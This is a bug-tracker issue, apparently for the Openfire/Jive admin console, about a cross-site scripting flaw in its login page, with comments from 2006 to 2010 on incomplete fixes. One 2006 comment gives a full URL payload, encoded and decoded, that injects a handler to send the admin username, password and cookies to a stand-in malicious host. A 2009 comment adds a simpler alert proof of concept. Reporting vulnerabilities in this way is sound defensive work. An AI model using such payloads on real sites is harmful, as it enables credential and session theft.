We're updating the issue view to help you get more done. 

Cross-site scripting attack in the login form

Description

As reported by a community member, there is a cross-site scripting vulnerability in the login page of the admin console. Although it's unlikely to be exploited, it's important to get fixed.

Environment

None

Acceptance Test - Entry

None

Activity

Show:
Juan C Calderon
January 18, 2006, 5:15 AM

Hello guys

I'm affraid this issue was not completelly fixed. The problem still exists for "url" parameter and the fix implementation for "username" parameter is failed since a XSS attack without less-than-character,
like the following, is still working. The followgin attack imnplements a small function to steel admin credentials and send them to a (ficticious) malicious site, it is fully functional:
http://JiveServer:9090/login.jsp?username=%22+onchange%3D%27document.loginForm.onsubmit%3Drobit%3Bfunction+robit%28%29+%7Bvar+image%3Bimage+%3D+new+Image%28%29%3Bimage.src+%3D+%22http%3A%2F%2Fwww.malicioussite.com%2FGet.asp%3FUsuario%3D%22+%2B+loginForm.username.value+%2B+%22%26Password%3D%22+%2B+loginForm.password.value+%2B+%22%26cookies%3D%22+%2B+document.cookie%7D%27+me%3D%22

URL decoded
http://JiveServer:9090/login.jsp?username=" onchange='document.loginForm.onsubmit=robit;function robit() {var image;image = new Image();image.src = "http://www.malicioussite.com/Get.asp?Usuario=" + loginForm.username.value + "&Password=" + loginForm.password.value + "&cookies=" + document.cookie}' me="

Please check the following resource for more information of different possible attacks.
http://ha.ckers.org/xss.html

Regards,
JC

davesan
June 26, 2009, 9:43 PM

I looked around, but I didn't see anything more on this. It appears to be marked "fixed", but the admin console, as of version 3.6.4 is still vulnerable to XSS.

e.g.,
http://../openfire/login.jsp?url=%2Findex.jsp&login=&username=%22%20onclick=%22alert(%27xss%27)&password=

Daryl Herzmann
June 26, 2009, 10:44 PM

reopening.

Guus der Kinderen
January 11, 2010, 3:44 AM

Fixed the XSS on the login screen.

Yehuda Katz
April 19, 2010, 6:09 AM

I am not sure the correct solution is to just strip these characters.
My understanding is that some of the characters that function strips could be valid username characters and while the likelyhood of someone using them is low, I would hate to see functionality in the program arbitrarily broken to fix this bug.

I would contribute a fix, but I am having some trouble getting eclipse to work, and since that is my editor of choice.

Assignee

Guus der Kinderen

Reporter

MattM

Labels

None

Expected Effort

None

Ignite Forum URL

None

Components

Fix versions

Affects versions

Priority

Blocker
Configure